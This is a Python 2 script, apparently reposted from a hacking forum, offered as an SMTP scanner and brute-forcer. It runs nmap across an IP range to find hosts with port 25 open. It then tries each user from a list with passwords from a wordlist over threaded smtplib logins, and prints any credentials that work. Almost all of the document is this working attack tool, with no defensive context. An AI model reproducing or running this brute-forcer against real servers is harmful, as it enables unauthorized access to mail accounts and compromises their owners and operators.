############################ [py] Smtp Scanner And Bruteforce###########

1. ###########################
2.  
3. # [py] Smtp Scanner And Bruteforce
4.  
5. ###########################
6.  
7. #!usr/bin/python
8. #Smtp Brute Forcer, searches ip_range for hosts using smtp.
9. #[Doar userii inregistrati pot vedea linkurile. ]
10. #d3hydr8[at]gmail[dot]com
11.  
12. import threading, time, StringIO, commands, random, sys, smtplib, re, socket
13. from smtplib import SMTP
14. from copy import copy
15.  
16. if len(sys.argv) !=4:
17. print "Usage: ./smtpbrute_iprange.py <ip_range> <userlist> <wordlist>"
18. sys.exit(1)
19.  
20. try:
21. users = open(sys.argv[2], "r").readlines()
22. except(IOError):
23. print "Error: Check your userlist path\n"
24. sys.exit(1)
25.  
26. try:
27. words = open(sys.argv[3], "r").readlines()
28. except(IOError):
29. print "Error: Check your wordlist path\n"
30. sys.exit(1)
31.  
32. print "\n\t d3hydr8[at]gmail[dot]com smtpBruteForcer v1.0"
33. print "\t--------------------------------------------------\n"
34. print "[+] Scanning:",sys.argv[1]
35. print "[+] Users Loaded:",len(users)
36. print "[+] Words Loaded:",len(words)
37.  
38. wordlist = copy(words)
39.  
40. def scan():
41.  
42. iprange = sys.argv[1]
43. ip_list = []
44.  
45. nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 '+iprange+' -p 25 | grep open -B 3')[1]).readlines()
46.  
47. for tmp in nmap:
48. ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
49. if ipaddr:
50. ip_list.append(ipaddr[0])
51. return ip_list
52.  
53. def reloader():
54. for word in wordlist:
55. words.append(word)
56.  
57. def getword():
58. lock = threading.Lock()
59. lock.acquire()
60. if len(words) != 0:
61. value = random.sample(words, 1)
62. words.remove(value[0])
63.  
64. else:
65. reloader()
66. value = random.sample(words, 1)
67.  
68. lock.release()
69. return value[0][:-1]
70.  
71. class Workhorse(threading.Thread):
72.  
73. def run(self):
74. value = getword()
75. try:
76. print "-"*12
77. print "User:",user[:-1],"Password:",value
78. smtp = smtplib.SMTP(ip)
79. smtp.login(user[:-1], value)
80. print "\t\nLogin successful:",user, value
81. smtp.quit()
82. work.join()
83. sys.exit(2)
84. except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException), msg:
85. #print "An error occurred:", msg
86. pass
87.  
88. ip_list = scan()
89. print "[+] Hosts Loaded:",len(ip_list),"\n"
90. for ip in ip_list:
91. print "\n\tAttempting BruteForce:",ip,"\n"
92. try:
93. helo = smtplib.SMTP(ip)
94. print helo.helo(), "\n"
95. helo.quit()
96. except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException):
97. print "Server doesn't support the Helo cmd"
98. for user in users:
99. for i in range(len(words)):
100. if i == 0: reloader()
101. work = Workhorse()
102. work.start()
103. time.sleep(2)